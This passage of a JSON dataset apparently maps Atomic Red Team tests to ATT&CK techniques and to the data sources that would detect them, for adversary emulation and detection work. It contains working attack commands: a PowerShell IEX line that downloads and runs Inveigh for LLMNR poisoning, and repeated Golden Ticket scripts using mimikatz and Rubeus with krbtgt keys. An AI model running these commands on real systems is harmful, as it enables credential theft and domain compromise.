#{path_to_pam_conf}\n", + "cleanup_command": "sudo sed -i \"\\,#{pam_rule},d\" #{path_to_pam_conf}\n" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ] + ] + }, + { + "technique_id": "T1557.001", + "command_list": [ + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/82be2377ade47a4e325217b4144878a59595e750/Inveigh.ps1\" -UseBasicParsing)\nInvoke-Inveigh -ConsoleOutput Y -NBNS Y -MDNS Y -HTTPS Y -PROXY Y" + ], + "commands": [ + { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/82be2377ade47a4e325217b4144878a59595e750/Inveigh.ps1\" -UseBasicParsing)\nInvoke-Inveigh -ConsoleOutput Y -NBNS Y -MDNS Y -HTTPS Y -PROXY Y", + "source": "atomics/T1557.001/T1557.001.yaml", + "name": "Atomic Red Team Test - Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1557.001", + "display_name": "Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay", + "atomic_tests": [ + { + "name": "LLMNR Poisoning with Inveigh (PowerShell)", + "auto_generated_guid": "deecd55f-afe0-4a62-9fba-4d1ba2deb321", + "description": "Inveigh conducts spoofing attacks and hash/credential captures through both packet sniffing and protocol specific listeners/sockets. This Atomic will run continuously until you cancel it or it times out.", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/82be2377ade47a4e325217b4144878a59595e750/Inveigh.ps1\" -UseBasicParsing)\nInvoke-Inveigh -ConsoleOutput Y -NBNS Y -MDNS Y -HTTPS Y -PROXY Y", + "name": "powershell", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service creation", + "description": "A service/daemon was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "service" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + } + ], + "external_reference": [ + null, + [ + "https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications", + "https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ] + ] + }, + { + "technique_id": "T1558.001", + "command_list": [ + "Remove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n\n# get current domain SID if default was used\n$domain_sid = \"S-1-5-21-DEFAULT\"\nIf ($domain_sid -Match \"DEFAULT\") {\n # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60\n $domain = gwmi Win32_ComputerSystem | Select -Expand Domain\n $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value\n $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))\n}\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to golden.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\golden.txt 2>&1 (\n echo Purge existing tickets and create golden ticket:\n klist purge\n #{mimikatz_path} \"kerberos::golden /domain:#{domain} /sid:DOMAIN_SID /aes256:#{krbtgt_aes256_key} /user:#{account} /ptt\" \"exit\"\n\n echo.\n echo Requesting SYSVOL:\n dir \\\\#{domain}\\SYSVOL\n \n echo.\n echo Tickets after requesting SYSVOL:\n klist\n\n echo.\n echo End of Golden Ticket attack\n)\n\"@ -Replace \"DOMAIN_SID\", $domain_sid | Out-File -Encoding OEM $env:TEMP\\golden.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\golden.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\golden.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Golden Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\golden.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n", + "Remove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n\n# get current domain SID if default was used\n$domain_sid = \"#{domain_sid}\"\nIf ($domain_sid -Match \"DEFAULT\") {\n # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60\n $domain = gwmi Win32_ComputerSystem | Select -Expand Domain\n $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value\n $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))\n}\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to golden.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\golden.txt 2>&1 (\n echo Purge existing tickets and create golden ticket:\n klist purge\n #{mimikatz_path} \"kerberos::golden /domain:%userdnsdomain% /sid:DOMAIN_SID /aes256:#{krbtgt_aes256_key} /user:#{account} /ptt\" \"exit\"\n\n echo.\n echo Requesting SYSVOL:\n dir \\\\%userdnsdomain%\\SYSVOL\n \n echo.\n echo Tickets after requesting SYSVOL:\n klist\n\n echo.\n echo End of Golden Ticket attack\n)\n\"@ -Replace \"DOMAIN_SID\", $domain_sid | Out-File -Encoding OEM $env:TEMP\\golden.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\golden.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\golden.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Golden Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\golden.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n", + "Remove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n\n# get current domain SID if default was used\n$domain_sid = \"#{domain_sid}\"\nIf ($domain_sid -Match \"DEFAULT\") {\n # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60\n $domain = gwmi Win32_ComputerSystem | Select -Expand Domain\n $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value\n $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))\n}\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to golden.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\golden.txt 2>&1 (\n echo Purge existing tickets and create golden ticket:\n klist purge\n #{mimikatz_path} \"kerberos::golden /domain:#{domain} /sid:DOMAIN_SID /aes256:#{krbtgt_aes256_key} /user:goldenticketfakeuser /ptt\" \"exit\"\n\n echo.\n echo Requesting SYSVOL:\n dir \\\\#{domain}\\SYSVOL\n \n echo.\n echo Tickets after requesting SYSVOL:\n klist\n\n echo.\n echo End of Golden Ticket attack\n)\n\"@ -Replace \"DOMAIN_SID\", $domain_sid | Out-File -Encoding OEM $env:TEMP\\golden.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\golden.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\golden.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Golden Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\golden.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n", + "Remove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n\n# get current domain SID if default was used\n$domain_sid = \"#{domain_sid}\"\nIf ($domain_sid -Match \"DEFAULT\") {\n # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60\n $domain = gwmi Win32_ComputerSystem | Select -Expand Domain\n $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value\n $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))\n}\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to golden.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\golden.txt 2>&1 (\n echo Purge existing tickets and create golden ticket:\n klist purge\n #{mimikatz_path} \"kerberos::golden /domain:#{domain} /sid:DOMAIN_SID /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9 /user:#{account} /ptt\" \"exit\"\n\n echo.\n echo Requesting SYSVOL:\n dir \\\\#{domain}\\SYSVOL\n \n echo.\n echo Tickets after requesting SYSVOL:\n klist\n\n echo.\n echo End of Golden Ticket attack\n)\n\"@ -Replace \"DOMAIN_SID\", $domain_sid | Out-File -Encoding OEM $env:TEMP\\golden.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\golden.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\golden.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Golden Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\golden.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n", + "Remove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n\n# get current domain SID if default was used\n$domain_sid = \"#{domain_sid}\"\nIf ($domain_sid -Match \"DEFAULT\") {\n # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60\n $domain = gwmi Win32_ComputerSystem | Select -Expand Domain\n $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value\n $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))\n}\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to golden.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\golden.txt 2>&1 (\n echo Purge existing tickets and create golden ticket:\n klist purge\n $env:TEMP\\mimikatz\\x64\\mimikatz.exe \"kerberos::golden /domain:#{domain} /sid:DOMAIN_SID /aes256:#{krbtgt_aes256_key} /user:#{account} /ptt\" \"exit\"\n\n echo.\n echo Requesting SYSVOL:\n dir \\\\#{domain}\\SYSVOL\n \n echo.\n echo Tickets after requesting SYSVOL:\n klist\n\n echo.\n echo End of Golden Ticket attack\n)\n\"@ -Replace \"DOMAIN_SID\", $domain_sid | Out-File -Encoding OEM $env:TEMP\\golden.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\golden.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\golden.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Golden Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\golden.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n", + "Remove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n\ncmd.exe /c \"#{local_folder}\\#{local_executable}\" golden /aes256:#{krbtgt_aes256_key} /ldap /user:#{account} /dc:$($ENV:logonserver.TrimStart('\\') + \".\" + \"$ENV:userdnsdomain\") /printcmd /outfile:golden\n$filename = (Get-ChildItem | ? {$_.Name.startswith(\"golden_\")} | Sort-Object -Descending -Property LastWriteTime | select -First 1).Name\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to golden.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\golden.txt 2>&1 (\n echo Purge existing tickets and create golden ticket:\n klist purge\n cd %temp%\n \"#{local_folder}\\#{local_executable}\" ptt /ticket:kirbifile\n\n echo.\n echo Requesting SYSVOL:\n dir \\\\$($ENV:logonserver.TrimStart('\\') + \".\" + \"$ENV:userdnsdomain\")\\SYSVOL\n \n echo.\n echo Tickets after requesting SYSVOL:\n klist\n\n echo.\n echo End of Golden Ticket attack\n)\n\"@ -Replace \"kirbifile\", $filename | Out-File -Encoding OEM $env:TEMP\\golden.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\golden.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\golden.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Golden Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\golden.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n", + "Remove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n\ncmd.exe /c \"#{local_folder}\\#{local_executable}\" golden /aes256:#{krbtgt_aes256_key} /ldap /user:$ENV:username /dc:$(#{domaincontroller}) /printcmd /outfile:golden\n$filename = (Get-ChildItem | ? {$_.Name.startswith(\"golden_\")} | Sort-Object -Descending -Property LastWriteTime | select -First 1).Name\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to golden.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\golden.txt 2>&1 (\n echo Purge existing tickets and create golden ticket:\n klist purge\n cd %temp%\n \"#{local_folder}\\#{local_executable}\" ptt /ticket:kirbifile\n\n echo.\n echo Requesting SYSVOL:\n dir \\\\$(#{domaincontroller})\\SYSVOL\n \n echo.\n echo Tickets after requesting SYSVOL:\n klist\n\n echo.\n echo End of Golden Ticket attack\n)\n\"@ -Replace \"kirbifile\", $filename | Out-File -Encoding OEM $env:TEMP\\golden.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\golden.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\golden.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Golden Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\golden.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n", + "Remove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n\ncmd.exe /c \"#{local_folder}\\#{local_executable}\" golden /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9 /ldap /user:#{account} /dc:$(#{domaincontroller}) /printcmd /outfile:golden\n$filename = (Get-ChildItem | ? {$_.Name.startswith(\"golden_\")} | Sort-Object -Descending -Property LastWriteTime | select -First 1).Name\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to golden.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\golden.txt 2>&1 (\n echo Purge existing tickets and create golden ticket:\n klist purge\n cd %temp%\n \"#{local_folder}\\#{local_executable}\" ptt /ticket:kirbifile\n\n echo.\n echo Requesting SYSVOL:\n dir \\\\$(#{domaincontroller})\\SYSVOL\n \n echo.\n echo Tickets after requesting SYSVOL:\n klist\n\n echo.\n echo End of Golden Ticket attack\n)\n\"@ -Replace \"kirbifile\", $filename | Out-File -Encoding OEM $env:TEMP\\golden.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\golden.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\golden.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Golden Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\golden.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n", + "Remove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n\ncmd.exe /c \"$Env:temp\\#{local_executable}\" golden /aes256:#{krbtgt_aes256_key} /ldap /user:#{account} /dc:$(#{domaincontroller}) /printcmd /outfile:golden\n$filename = (Get-ChildItem | ? {$_.Name.startswith(\"golden_\")} | Sort-Object -Descending -Property LastWriteTime | select -First 1).Name\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to golden.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\golden.txt 2>&1 (\n echo Purge existing tickets and create golden ticket:\n klist purge\n cd %temp%\n \"$Env:temp\\#{local_executable}\" ptt /ticket:kirbifile\n\n echo.\n echo Requesting SYSVOL:\n dir \\\\$(#{domaincontroller})\\SYSVOL\n \n echo.\n echo Tickets after requesting SYSVOL:\n klist\n\n echo.\n echo End of Golden Ticket attack\n)\n\"@ -Replace \"kirbifile\", $filename | Out-File -Encoding OEM 